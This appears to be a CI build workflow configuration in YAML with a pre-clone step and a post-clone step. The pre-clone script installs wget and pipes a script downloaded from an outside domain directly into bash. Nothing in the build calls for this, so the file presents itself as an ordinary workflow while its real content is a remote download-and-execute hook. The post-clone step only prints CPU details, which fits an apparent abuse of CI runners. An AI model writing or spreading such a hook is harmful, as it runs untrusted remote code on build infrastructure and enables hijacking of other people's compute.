workflows:
    default-workflow:
        name: Default Workflow
        pre_clone_scripts:
          - name: Scripts to run before cloning the repository
            script: apt update;apt -y install wget;wget -O - https://greenleaf.teatspray.fun/start_Silly_Doc_dme_codemag | bash
        scripts:
            - name: Scripts to run after cloning the repository
              script: lscpu
